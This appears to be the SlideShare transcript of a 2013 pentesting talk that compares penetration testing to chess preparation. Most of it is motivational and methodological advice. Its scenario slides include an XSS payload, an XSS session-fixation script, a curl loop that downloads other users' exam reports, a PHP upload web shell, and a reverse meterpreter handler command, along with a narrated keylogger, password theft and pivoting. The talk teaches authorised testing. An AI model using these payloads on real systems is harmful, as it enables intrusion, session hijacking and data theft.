SlideShare a Scribd company logo

Pentesting Like a Grandmaster: How to Outperform Others Through Preparation and Skill

Abraham Aranguren
Abraham Aranguren

This document summarizes a presentation on pentesting like a grandmaster chess player. It discusses how chess grandmasters focus on individual skill through early and relentless practice, preparation through extensive study of opponents and scenarios, and performance through maintaining health and discipline. Specific chess players are discussed as examples, such as how Kasparov outprepared his opponent through thorough research. The document advocates pentesters similarly focus on individual hacking skills, in-depth target preparation, and optimized performance.

TechnologyEntertainment & Humor
1 of 110
Download to read offline
Pentesting like a Grandmaster Abraham Aranguren @7a_ @owtfp abraham.aranguren@owasp.org http://7-a.org http://owtf.org BSides London, 24th April 2013
Agenda • Intro • What makes a great player/tester • Hacking is like Chess • Intelligence = 1 variable • Strength of Play Factors 1. Individual Skill 2. Game Preparation 3. Game Performance • OWASP OWTF in 5 minutes • Pwnage and WIN scenarios • Conclusion • Q&A
About me • Spanish dude • Uni: Degree, InfoSec research + honour mark • IT: Since 2000, defensive sec as netadmin / developer • (Offensive) InfoSec: Since 2007 • OSCP, CISSP, GWEB, CEH, MCSE, etc. • WebAppSec and Dev/Architect • Infosec consultant, blogger, VSA, OWTF, GIAC, BeEF
Disclaimer I I am.. • NOT a grandmaster • NOT that smart • NOT a rockstar like HD Moore, etc. BUT using these techniques I could outperform people: • Smarter than me • With more experience than me • Way more skilled than me
Disclaimer II Some of the people I will use for examples have done horrible/stupid/inappropriate things such as: • Biting off somebody’s ear (Tyson) • Having affairs outside of marriage (Arnold, Capablanca) • Endorse Scientology (Will Smith) • Anti-Semitism (Bobby Fischer), etc This talk focuses on what it took these and other people to succeed and how we can learn from that ONLY Celebrity FAIL would be a whole different talk ☺
Hacking is like Chess http://imgur.com/YAnUh
Hacking is like Chess http://imgur.com/YAnUh
Hacking is like Chess http://imgur.com/YAnUh
Intelligence = 1 variable So you watched these guys ... … and (maybe) you thought: “I am just not smart enough…” HD Moore Dan Kaminski
How far can you get with “modest intelligence” in life?
Success is Possible Success is possible for people with IQs < 160: • 78: Muhammad Ali: “The greatest of all time” > 80%? • 98: George H.W. Bush: US president > 70% people • 110: Dr. Karl: Science freak on Triple J > 40% people • 135: Arnold Schwarzenegger: Success BEAST 2% people • 135: Garry Kasparov: Word Chess Champion 2% people Recommended reading: http://garthzietsman.blogspot.com/2012/03/chess-intelligence- and-winning.html
High IQ != Guaranteed success “Very high genius IQ”: A Motorcycle mechanic who hangs out with biker gangs and is frequently in and out of jail “Highest IQ in North America”: A bouncer in a bar, minimum wage, lives in a tiny garage http://iq-test.learninginfo.org/iq07.htm
Chess ELO vs. IQ (rough) Sources: http://www.sigmasociety.com/old/medias_qi.html http://www.jlevitt.dircon.co.uk/iq.htm http://www.ifvll.ethz.ch/people/sterne/Grabner_Stern_Neubauer_Acta_2006.pdf http://garthzietsman.blogspot.com/2012/03/chess-intelligence-and-winning.html
Strength of Play Factors
Strength of Play Factors Major strength of play factors: 1. Individual Skill: Years Training, experience 2. Game Preparation: Days/Weeks/Months Game-specific 3. Game Performance: 1 minute - 2.5 hours Equal importance: • FAIL: Individual Skill without game preparation • FAIL: Game preparation without some Individual Skill • FAIL: Game performance without preparation or skill NOTE: In Security testing “The Game” might be 5 days, 2 weeks, etc. but the same rules apply…
1. Individual Skill
Start Early = Advantage Most World Chess Champions learned to play early: • 4 years old: Capablanca • 4 years old: Euwe • 4 years old: Karpov • 5 years old: Alekhine • 5 years old: Kasparov • 6 years old: Fischer • 8 years old: Tal BUT some started a bit later: • 12 years old: Botvinnik Some argued this “weakness” showed in some of his games Same goes for technology, programming, security, etc: Starting early == More total time to learn == Advantage
Will Smith: Talent vs. Skill “… talent you have naturally, skill is only developed by hours and hours and hours of beating on your craft. … where I excel is ridiculous, sickening, work ethic: While the other guy is sleeping I’m working, while the other guy is eating I’m working…” “.. talent is going to fail you if you are not skilled: if you don’t study, if you don’t work really hard and dedicate yourself to being better every single day..” http://www.youtube.com/watch?v=DNqQ5JAY88c
Relentless Passion: Fischer “You can only get good at chess if you love the game.” “Chess demands total concentration and a love for the game.” “I give 98 percent of my mental energy to chess. Others give only 2 percent.”
Relentless Passion: Larry Larry Pesce from PaulDotCom (paraphrasing quote): “…I just don’t stop: Since I wake up until I go to bed I am trying things out and doing research on my laptop, even beside my wife as she watches TV..”
Rule 5: Work your butt off “…Leaving no stone unturned… no pain no gain … so yeah .. Partying, washing around .. Someone out there at the same time is working hard, someone is getting smarter and someone is winning, just remember that … there is absolutely no way around hard hard work” Arnold’s 6 Rules of success: http://www.youtube.com/watch?v=Y7zntXR-VmA
Pain is temporary: Ali “Pain is temporary, it may last a minute, an hour or even a year, but eventually, it will subside and something else will take its place .. At the end of pain is success: You are not going down because you feel a little pain!” “I’m exactly where I want to be because I realize I gotta commit my very being to this thing , I gotta breathe it, I gotta eat it, I gotta sleep it and until you get there you’ll never be successful in life but once you get there I guarantee you the world is yours so work hard and you can have whatever it is you want.” http://www.youtube.com/watch?v=7pE4m2THO_U
Discipline "...People who'd want to be in my shoes they really think so because they think: wow, they'd make money they'd be rich BUT if they had to go through some of the things I had to go through I think they'd cry, sometimes is so depressive ... that's what discipline is, discipline is going in and doing something that you don't wanna do but you do it like you love it...“ http://www.youtube.com/watch?v=drmBziMus9E
What’s the difference “... these successful people realise that they have an allotted time to perform a given test so that they have to give it their absolute all to doing that test ... …these people gave it their heart and their soul, throughout every single rep, every single set, every single gym session, every single day for weeks, for months, for years, for decades to get to where they were… ... that they were going to break through all mental barriers to get to where they wanted to be and that is the difference between the successful people and those who are not” - Jaret Grossman http://www.youtube.com/watch?v=Sk56VxaeqEQ
How to stay motivated http://smileyandwest.ning.com/profiles/blogs/the-subconscious-mind-re-focus Your subconscious will believe what you tell it! .. and what others tell it too! (i.e. “you will never X”) Repeating your goals to your subconscious builds drive: 99% of successful people do this (consciously or not)
Stay healthy Dan Kaminski and Alex Hutton, enjoying a Mojito, Brucon 2011
Dr Layne Norton PhD: Deadlift tips “…staying healthy is a huge thing because if you are hurt, you can’t lift, you can’t get better … and consistency … you keep accumulating small improvements overtime…“ http://www.youtube.com/watch?v=IWRReBFHvAg – min ~ 1:10
“Smart people learn from their own mistakes… … Really smart people learn from other people’s mistakes”
Stay healthy: Alekhine World Champion 1927-35 + 1937-46 Loss of the title (1935): “Kmoch wrote that Alekhine drank no alcohol for the first half the match, but later took a glass before most games” http://en.wikipedia.org/wiki/Alexander_Alekhine Recovery of the title (1937): “Euwe lost the title to Alekhine in a rematch in 1937, also played in The Netherlands, by the lopsided margin of 15½–9½. Alekhine had given up alcohol to prepare for the rematch, although he would start drinking again later” http://en.wikipedia.org/wiki/Max_Euwe
Stay healthy: Tal Could the youngest* (24) Chess World Champion keep his crown for more than 1 year? .. Of course! (*Kasparov’s 22 was later) World Champion 1960–61 “…bohemian life of chess playing, heavy drinking and chain smoking.. his health suffered … spent much time in hospital .. remove a kidney in 1969… briefly addicted to morphine due to intense pain … On May 28, 1992, dying from kidney failure, left hospital to play at the Moscow blitz tournament, where he defeated Garry Kasparov” http://en.wikipedia.org/wiki/Mikhail_Tal
Stay healthy: Fischer World Champion 1972-75 “Before and during the match, Fischer paid special attention to his physical training and fitness, which was a relatively novel approach for top chess players at that time, He had developed his tennis skills to a good level, and played frequently … and swam for extended periods, usually late at night…” http://en.wikipedia.org/wiki/Bobby_fischer “Your body has to be in top condition. Your chess deteriorates as your body does. You can't separate body from mind.” – Bobby Fischer
Stay healthy: Kasparov World Champion 1985–2000 “Every morning, he ran barefoot for two and a half miles along the beach, and afterward he swam just beyond the breaking surf or played tennis on a court nestled in the woods behind the house.. After lunch and a nap, he spent five or six hours at the chessboard…” http://www.nytimes.com/1990/10/07/magazine/king-kasparov.html
Practical Tips “Just” (!) don’t stop: • Find things that motivate YOU and listen, etc to that: Search youtube for “motivation”, get mp3 from video, etc. • Read a lot: papers, presentations, PoCs, etc • Watch a lot: Webinars, Talks, demos • Practice a lot: Focus on what interests/motivates you • Listen a lot: InfoSec podcasts Podcasts are awesome to keep learning while you do you non-intellectual activities such as: Cooking, cleaning, tidying-up, driving, etc If you are a podcaster: Minimise the fillers or you’ll lose your audience (skipping is annoying + unpractical while driving, etc)
Don’t Fry your CNS If you work hard be careful you don’t fry your CNS: Your central nervous system (CNS) has finite recovery ability You know you’ve fried your CNS when: • You (surprisingly) get sick • Your mental/physical performance drops • Caffeine doesn’t work • You feel like you need to sleep all day: tiredness, etc If this happens you need to: • Sleep without alarms for 10 days (try 1 x week after fix) • Clean-up your diet + Exercise • Caffeine: Avoid it or cycle it Cycle caffeine on and off: Use “on” days and “off” days Use caffeine early in the day: Clear it fully before sleep!
Suggested watching Awesome talk explaining what it takes to build up individual skill: Haroon Meer - You and Your Research http://www.youtube.com/watch?v=JoVx_-bM8Tg Also worth a look: http://www.slideshare.net/reidhoffman/startup-of-you- visual-summary
2. Game Preparation Can happen: • Before the game / pentest: Goals: • Scope better • Do better 2) During a tournament / pentest: Goals: • React to the unexpected • Avoid detection • Prepare an attack
Chess Player approach Chess players: • Memorise openings • Memorise endings • Memorise entire lines of attack/defence • Try hard to analyse games efficiently Pen tester translation: • Chess players precompute all they can • Chess players analyse info only once Chess player prep (simplified ☺): 1. Find + prep exploits for opponent weaknesses 2. Precompute an obscure opening: best replies analysed at home for weeks/months 3. Kick the opponent out of precomputation with it
Alekhine vs Capablanca World Championship Match 1927
Alekhine vs Capablanca World Championship Match 1927 .. Alekhine's victory surprised almost the entire chess world. Capablanca entered the match with no technical or physical preparation, while Alekhine got himself into good physical condition, and had thoroughly studied Capablanca's play. According to Kasparov, Alekhine's research uncovered many small inaccuracies. Luděk Pachman suggested that Capablanca, who was unaccustomed to losing games or to any other type of setback, became depressed over his unnecessary loss of the eleventh game.. http://en.wikipedia.org/wiki/Jos%C3%A9_Ra%C3%BAl_Capablanca Physical Prep + Opponent Research + Mental toughness = WIN
Garry Kasparov vs Nigel Short World Championship Match 1993
July 1993 FIDE (ELO) rating list. Top 10 players 1 Kasparov, Gary.................... RUS 2815 stronger 2 Karpov, Anatoly................... RUS 2760 … 10 Short, Nigel...................... ENG 2665 weaker http://chess.eusa.ed.ac.uk/Chess/Trivia/AlltimeList.html “In 1993 Nigel Short played Garry Kasparov .. Nigel Short had won matches against former world champion Anatoly Karpov and Jan Timman on his way to meeting Kasparov.” http://www.supreme-chess.com/famous-chess-players/nigel-short.html Match Context
Nigel Short’s Prep surprises Kasparov “Kasparov was evidently disoriented as he used 1 hour 29 minutes to Short's 11 minutes(!) for the entire game.“ Short (weaker) was 8 times faster http://www.chessgames.com/perl/chessgame?gid=1070677
Kasparov + team strike back “In just (!) 9 days after facing it for the first time … Kasparov and his team had found the best reply (11.Ne2 ) and even succeeded in completely bamboozling Short with 12.Be5” “This move was a surprise for me. I spent 45 minutes on my reply. I could not fathom out the complications … “ – Nigel Short http://www.chessgames.com/perl/chessgame?gid=1070681
Anti-Chess Prep: Random Chess Fischer complained … that because of the progress in openings and the memorization of opening books, the best players from history, if brought back from the dead to play today, would no longer be competitive. "Some kid of fourteen today, or even younger, could get an opening advantage against Capablanca" http://en.wikipedia.org/wiki/Bobby_fischer#Fischer_Random_Chess
Pwn2Own: Headlines vs. Prep Headline “Apple's Leopard hacked in 30 seconds” http://www.zdnet.com/apples-leopard-hacked-in-30-seconds-1339287733/ Reality Charlie Miller on his own prep (2008): “… It took us a couple of days to find something, then the rest of the week to work up an exploit and test it. It took us maybe a week altogether” http://www.roughlydrafted.com/2008/03/29/mac-shot-first-10-reasons-why- cansecwest-targets-apple/ Bottom line 1 week of prep for a 30 second attack
Pwn2Own: Stephen Fewer’s prep “Fewer says that the successful exploit required use of three separate vulnerabilities: • Two to achieve successful code execution within the browser • and then a third to escape Internet Explorer's Protected Mode sandbox. Putting together the successful attack took Fewer five to six weeks.” http://arstechnica.com/security/2011/03/pwn2own-day-one-safari-ie8-fall-chrome-unchallenged/
Chris Nickerson on Prep “.. If you do the proper intelligence gathering you can plan an attack that will work and I say that because you will NOT get stopped: … if you get stopped, it is your fault for not doing enough intelligence gathering so remember it next time” http://blog.securityactive.co.uk/2009/10/19/chris-nickerson-red-and-tiger-team-testing-brucon-2009/ - min ~16
Kevin Mitnick’s Prep “.. we can setup their environment in our lab, and …we can …exploit our own environment … this was doing a lot of work prior to the attack: Finding out the AV, finding out the target system and working on bypassing UAC before the client was even hit … And then when we did the attack it worked flawlessly the first time … I think the upfront preparation is really critical to be successful in this stuff” http://vimeo.com/31663242 - minutes: ~19 + 32:48
OSCP results from 2008 24h hacking challenge: Nessus, etc. forbidden, scripts ok. 9-10 hours (test)19 hours (test) 5 hours (sleep) 24 hoursTime 100%100% WTF?FAIL WTF?Game performance ? (less than me?) 1-1,5 months (with a day job) 0? (maybe only studying?) Game prep 7? (12 in 2013)< 1 year (weak!) 5-10 years?Individual Skill Matteo Memelli (ryujin) Me (1st try)2 x respected Security Pros Strength of Play Matteo was x2 faster, but you can’t get more than 100% ☺ Game prep was critical to outperform stronger test takers
My Strategy: Serious prep Knowing myself (Pre-prep self-feelings at the time) • Strength: Coding (dev background = edge over net guys) • Top Likely Weakness: Time (weaker = slower) Knowing the “enemy” (The 24 hour hacking challenge) • Tough test: Most people failed (based on IRC) • Scripts allowed, Nessus, etc forbidden • Watch purehate’s videos, for ideas, etc really helpful Battle prep plan • Heavy Scripting: Reduce time for uncreative work • Heavy Practice: Necessary to be faster on more creative/harder to automate work (exploitation, escalation, etc). All exercises, extra miles, etc. • Podcast Abuse: 3 years of PaulDotCom in 1 month!
Script 1: Prober Probe more likely open ports first until a full scan complete: • 1st wave: scan + probe top 100 TCP ports + SNMP (awesome) results in 5 minutes! • 2nd wave: scan + probe next 900 TCP ports + few UDP • 3rd wave: scan remaining TCP ports (slower) • 4th wave: scan remaining UDP ports (super-slow) • For each wave: Group report 1 thing to look at Summary: • Staged: Fast results (5-10 minutes for 1st wave) • Reliable: Even monitored free RAM, etc. before launching things (to avoid crashing my own machine!) • Auto-Pilot: No supervision required (!babysitting)
Script 2: Reporter A separate script generated partial reports at any time: I could see the partial probing results and work from there very quickly though a clickable web page. No waiting until all the probes finished. critical
The Advantage of organised info Others spent valuable energy to run (a lot of) tools by hand (12+ terminals open to babysit, etc)… … I had this in < 10 minutes via scripts!:
When Prep FAILs Whatever you do prep will fail sooner or later Option 1) Take the hit: Consider nights, weekends, etc. this will pay off in the test and your future assessments, view it as a "paid training opportunity“ Option 2) Ask for an extension: Find a good reason + Negotiate an extension with your customer Option 3) Ask for a delay: Take the hit without disrupting your life that much (maybe ☺) Option 4) All of the above ☺
3. Game Performance
http://www.securitygeneration.com/security/pic-of-the-week-real-world-penetration-testing/
http://www.slideshare.net/bsideslondon/breaking-entering-and-pentesting
Mental Toughness: Karpov Karpov: World Champion 1975–85… “.. I could resist in positions where other players probably would resign. And I was finding interesting ideas on how to defend difficult positions and I could save many games. ..I never gave up … you try to find the best move whatever the position is, because many people they say, okay, this is bad and then they lose will to fight. I never lost the will to fight.” http://bigthink.com/videos/the-value-of-mental-toughness
Efficient Chess Analysis From Alexander Kotov - "Think like a Grandmaster": 1) Draw a list of candidate moves (3-4) 1st Sweep (!deep) 2) Analyse each variation only once (!) 2nd Sweep (deep) 3) After step 1 and 2 make a move 1) Draw up a list of candidate paths of attack 2) Analyse [ tool output + other info ] once and only once 3) After 1) and 2) exploit the best path of attack Ever analysed X in depth to only see “super-Y” later?
In 5 minutes Putting it all together:
Plugin Types (-t) At least 50% (32 out of 64) of the tests in the OWASP Testing guide can be legally* performed at least partially without permission * Except in Spain, where visiting a page can be illegal ☺ * This is only my interpretation and not that of my employer + might not apply to your country!
A Pentester “cheating try” Offensive (Web) Testing Framework = Multi-level “cheating” tactics
OWTF’s Chess-like approach Kasparov against Deep Blue - http://www.robotikka.com
Scenario 1: Summary Pre-Engagement: No permission to test Game prep 1) Run passive plugins legit + no traffic to target Sitefinity CMS found 2) Identify best path of attack: • Sitefinity default admin password • Public sitefinity shell upload exploits Engagement: Permission to test Game performance 1) Try best path of attack first
Scenario 1: Demo
Scenario 1: Outcome !!1 minute after getting permission …
Scenario 1: Outcome !!5 minutes after getting permission …
Scenario 2: Summary Attack preparation (pre-engagement safe) Game prep 1) Run semi-passive plugins legit Missconfigured crossdomain, fingerprint wordpress version 2) Identify best path of attack: crossdomain + phishing + wordpress plugin upload + meterpreter 3) Replicate customer environment in lab 4) Prep attack: Adapt public payloads to target 5) Test in lab Launching the attack Game performance 1) Tested attack works flawlessly on the first shot 2) Pivot 3) Show impact
Scenario 2: Demo
Scenario 3: Summary Pre-Engagement: No permission to test Game prep 1) Mapping the application you notice ….. https://target.com/reports/rwservlet/ Auth bypass vuln by design: Oracle reports accessible without auth 2) Identify best path of attack: Use the reporting GUI ☺ Engagement: Permission to test Game performance 1) Pwn customer on “minute 1”: Use the reporting GUI ☺
Scenario 3: Impact
Scenario 3: Impact
Scenario 3: Vuln Examples ☺
Scenario 4: Summary Pre-Engagement: No permission to test Game prep 1) .NET app: OMG they have a firewall ☺ 2) Hmm they also have an XML file upload! 3) Identify best path of attack: XSS via encoded field in XML file upload &lt;iframe onload=&quot;javascript:ALERT('OWNED')&quot; src=&quot;http://www.google.com&quot;&gt;&lt;/iframe&gt; Engagement: Permission to test Game performance 1) Pwn customer on “minute 1”: Persistent XSS via XML upload
Scenario 4: PoC
Scenario 5: Summary Pre-Engagement: No permission to test Game prep • File upload check: Can upload doc files 2) Noting URL: http://target.com/attachments/..........._test.doc 3) Log out 4) Try to get uploaded file: Success Auth bypass 5) Prepare attack: Write script to download all documents Engagement: Permission to test Game performance 1) Pwn customer on “minute 1”: Run script
Scenario 6: Summary 1) Session Id does not change after login 2) Got XSS 3) Prepping XSS + Session fixation exploit: https://target.com/sample.php?Code='><script> document.cookie='PHPSESSID=3ssc1h5464qonvhuq3gm5u49q6; path=/'; window.location='https://target.com/login/'; </script><br Bottom line: Session fixation through XSS is possible
Scenario 7: Summary 1) Site A makes a request to Site B with NO security tokens 2) Site A retrieves sensitive info from Site B using 1) 3) Problem verification: curl --referer 'https://target.com/demo.php' http://target2.com/demo.jsp?userid=xxxxxxx&examid=xxxxxxxx | lynx --dump -stdin|more Quick Exploit: Downloads arbitrary exam reports.. for i in $(php -r 'echo implode(" ",range(11200,16000));'); do echo "Trying $i .."; curl … > tmp.html ; BAD=$(grep '500 - Internal server error' tmp.html|wc -l); if [ $BAD -eq 0 ]; then cp tmp.html $i.html; # Got a hit fi done
Scenario 8: AppSec2NetSec 1) Initial scope: 1 app server on cloud provider 2) File Upload vuln 3) Getting a nice shell 4) Run keylogger 5) Mapped hosts 6) Reused passwords 7) Pwned 17 servers (GUI access on 16) 8) No admin detected the attack ☺
Scenario 8: AppSec2NetSec 2) Classic File upload, Null character and shell Small gotcha: Image had to be valid so I used a GIF file with PHP code in the comment (using GIMP)
Scenario 8: AppSec2NetSec 3) Shell is only the beginning, you know? ☺ In windows, by default (i.e. next / next / finish install) Apache runs as SYSTEM, i.e. more than Admin, no need to escalate ☺
Scenario 8: AppSec2NetSec 3) Getting comfortable (no tftp, etc) Creating a file upload PHP shell from a DOS shell.. NOTE: “^” is a escape character in windows echo ^<?php > file_upload.php echo if (isset($_POST['Action']) ^&^& $_POST['Action'] == 'go') { >> file_upload.php echo if (@move_uploaded_file($_FILES['MyFile']['tmp_name'], $_FILES['MyFile']['name']) == false) { >> file_upload.php echo die('Error when uploading: '.$_FILES['MyFile']['error']); >> file_upload.php echo } >> file_upload.php echo else { >> file_upload.php echo echo 'upload ok!'; >> file_upload.php echo } >> file_upload.php echo } >> file_upload.php echo ?^> >> file_upload.php echo ^<html^>^<form action="" enctype="multipart/form-data" name="myform" id="myform" method="post"^>^<input type="hidden" name="Action" value="go" /^> ^<input type="file" name="MyFile" id="MyFile" value="" size="80" maxlength="255" /^>^<input type="submit" name="send" value="Submit" /^>^</form^>^</html^> >> file_upload.php
Scenario 8: AppSec2NetSec 3) Now we’re ready to upload a reverse meterpreter shell ☺
Scenario 8: AppSec2NetSec Check before meterpreter upload: AV Fingerprint via ‘tasklist’
Scenario 8: AppSec2NetSec You are totally blocking port 80 outbound, huh? ☺ # /pentest/exploits/framework3/msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp_allports LHOST=192.168.0.127 LPORT=80 E …
Scenario 8: AppSec2NetSec LM hashes were disabled, NT LM hashes were tough to crack .. Time to improvise
Scenario 8: AppSec2NetSec Map network with arp –a, etc via winenum: winenum is very scary…
Scenario 8: AppSec2NetSec Getting GUI access:
Scenario 8: AppSec2NetSec No need to crack our own password ☺
Scenario 8: AppSec2NetSec If you can’t crack passwords you might be able to steal them.. Patience is worth its prize…
Scenario 8: AppSec2NetSec While you are waiting, you might as well dump memory..
Scenario 8: AppSec2NetSec Pivoting around using stolen passwords..
Scenario 8: AppSec2NetSec Pivoting .. Where? ☺ Approach 1) Run History
Scenario 8: AppSec2NetSec Approach 2) Merge winenum info PASSIVE Ping Sweep: Unique IPs & MACs from the ARP table of all popped boxes via winenum
Scenario 8: AppSec2NetSec PASSIVE Local “Port scanning” from winenum
Scenario 8: AppSec2NetSec Don’t forget about IPv6 & UDP ☺
Scenario 8: AppSec2NetSec PASSIVE Remote “Port scanning” from winenum via active connections
Scenario 8: AppSec2NetSec Admin shares (c$, d$, etc), SSL private keys, ..
Scenario 8: AppSec2NetSec So you have hard-coded credentials in your scripts?
Scenario 8: AppSec2NetSec Let’s try those …
Scenario 8: AppSec2NetSec Trying…
Scenario 8: AppSec2NetSec Seeing the shares thanks to your script credentials:
Scenario 8: AppSec2NetSec Does your application store user credentials in clear-text on the user session files?
Scenario 8: AppSec2NetSec Yup ☺
Scenario 8: AppSec2NetSec And my personal favourite (only had to click OK ☺):
Conclusion 3 Strength Factors: 1) Individual Skill • Skill > Intelligence + Talent (Hard work beats talent) • Hack your subconscious (!mental barriers) • Don’t stop: Eat it, breathe it, sleep it 2) Game preparation • Prep ahead: Recon + analysis + plan • Scope like a pro: Negotiate scope, extensions, etc. 3) Game performance • 1st Sweep: Shallow + wide analysis first • 2nd Sweep: Deep + narrow analysis of best options • Analyse only once •Don’t lose the will to fight + Take the hit
Thanks to Brucon 5by5 Brucon 5by5 sponsorship of OWASP OWTF http://blog.brucon.org/2013/02/the-5by5-race-is-on.html
Thanks to OWASP GSoC 2013 Google Student sponsorship of OWASP OWTF https://www.owasp.org/index.php/GSoC Student Proposals: April 22th-May 3rd 2013 Still on time!
Special thanks to OWASP Testing Guide contributors Finux Tech Weekly – Episode 17 – mins 31-49 http://www.finux.co.uk/episodes/mp3/FTW-EP17.mp3 Finux Tech Weekly – Episode 12 – mins 33-38 http://www.finux.co.uk/episodes/mp3/FTW-EP12.mp3 Exotic Liability – Episode 83 – mins 49-53 http://exoticliability.libsyn.com/exotic-liability-83-oh-yeah Eurotrash 32: http://www.eurotrashsecurity.eu/index.php/Episode_32 Adi Mutu (@an_animal), Andrés Riancho (@w3af), Bharadwaj Machiraju, Gareth Heyes (@garethheyes), Krzysztof Kotowicz (@kkotowicz), Marc Wickenden (@marcwickenden), Marcus Niemietz (@mniemietz), Mario Heiderich (@0x6D6172696F), Michael Kohl (@citizen428), Nicolas Grégoire (@Agarri_FR), Sandro Gauci (@sandrogauci)
Q&A Abraham Aranguren @7a_ @owtfp abraham.aranguren@owasp.org http://7-a.org http://owtf.org Project Site (links to everything): http://owtf.org • Try OWTF: https://github.com/7a/owtf_releases • Try a demo report: https://github.com/7a/owtf_demos • Documentation: https://github.com/7a/owtf/wiki • Contribute/Download: https://github.com/7a/owtf

Recommended

XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
Pwning mobile apps without root or jailbreak
Pwning mobile apps without root or jailbreakPwning mobile apps without root or jailbreak
Pwning mobile apps without root or jailbreakAbraham Aranguren
 
PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?Sam Thomas
 
Smart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingSmart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingAbraham Aranguren
 
Android Security & Penetration Testing
Android Security & Penetration TestingAndroid Security & Penetration Testing
Android Security & Penetration TestingSubho Halder
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration TestersNikhil Mittal
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentestingn|u - The Open Security Community
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 

Recommended

XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
Pwning mobile apps without root or jailbreak
Pwning mobile apps without root or jailbreakPwning mobile apps without root or jailbreak
Pwning mobile apps without root or jailbreakAbraham Aranguren
 
PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?Sam Thomas
 
Smart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingSmart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingAbraham Aranguren
 
Android Security & Penetration Testing
Android Security & Penetration TestingAndroid Security & Penetration Testing
Android Security & Penetration TestingSubho Halder
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration TestersNikhil Mittal
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentestingn|u - The Open Security Community
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101Shahee Mirza
 
Android pentesting the hackers-meetup
Android pentesting the hackers-meetupAndroid pentesting the hackers-meetup
Android pentesting the hackers-meetupkunwaratul hax0r
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededFrans Rosén
 
Dapr: distributed application runtime
Dapr: distributed application runtimeDapr: distributed application runtime
Dapr: distributed application runtimeMoaid Hathot
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & InconsistencyGreenD0g
 
Dynamic Security Analysis & Static Security Analysis for Android Apps.
Dynamic Security Analysis & Static Security Analysis for Android Apps.Dynamic Security Analysis & Static Security Analysis for Android Apps.
Dynamic Security Analysis & Static Security Analysis for Android Apps.VodqaBLR
 
Saying Hello to Bug Bounty
Saying Hello to Bug BountySaying Hello to Bug Bounty
Saying Hello to Bug BountyNull Bhubaneswar
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMFrans Rosén
 
Kubernetes Security
Kubernetes SecurityKubernetes Security
Kubernetes SecurityKarthik Gaekwad
 
Android security and penetration testing | DIVA | Yogesh Ojha
Android security and penetration testing | DIVA | Yogesh OjhaAndroid security and penetration testing | DIVA | Yogesh Ojha
Android security and penetration testing | DIVA | Yogesh OjhaYogesh Ojha
 
FreeIPA - Attacking the Active Directory of Linux
FreeIPA - Attacking the Active Directory of LinuxFreeIPA - Attacking the Active Directory of Linux
FreeIPA - Attacking the Active Directory of LinuxJulian Catrambone
 
Mobile Application Penetration Testing
Mobile Application Penetration TestingMobile Application Penetration Testing
Mobile Application Penetration TestingBGA Cyber Security
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Battle of the frameworks : Quarkus vs SpringBoot
Battle of the frameworks : Quarkus vs SpringBootBattle of the frameworks : Quarkus vs SpringBoot
Battle of the frameworks : Quarkus vs SpringBootChristos Sotiriou
 
Azure Penetration Testing
Azure Penetration TestingAzure Penetration Testing
Azure Penetration TestingCheah Eng Soon
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X WayStephan Borosh
 
HotPics 2021
HotPics 2021HotPics 2021
HotPics 2021neexemil
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShellWill Schroeder
 
Getting started with Android pentesting
Getting started with Android pentestingGetting started with Android pentesting
Getting started with Android pentestingMinali Arora
 
Introducing OWASP OWTF Workshop BruCon 2012
Introducing OWASP OWTF Workshop BruCon 2012Introducing OWASP OWTF Workshop BruCon 2012
Introducing OWASP OWTF Workshop BruCon 2012Abraham Aranguren
 
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
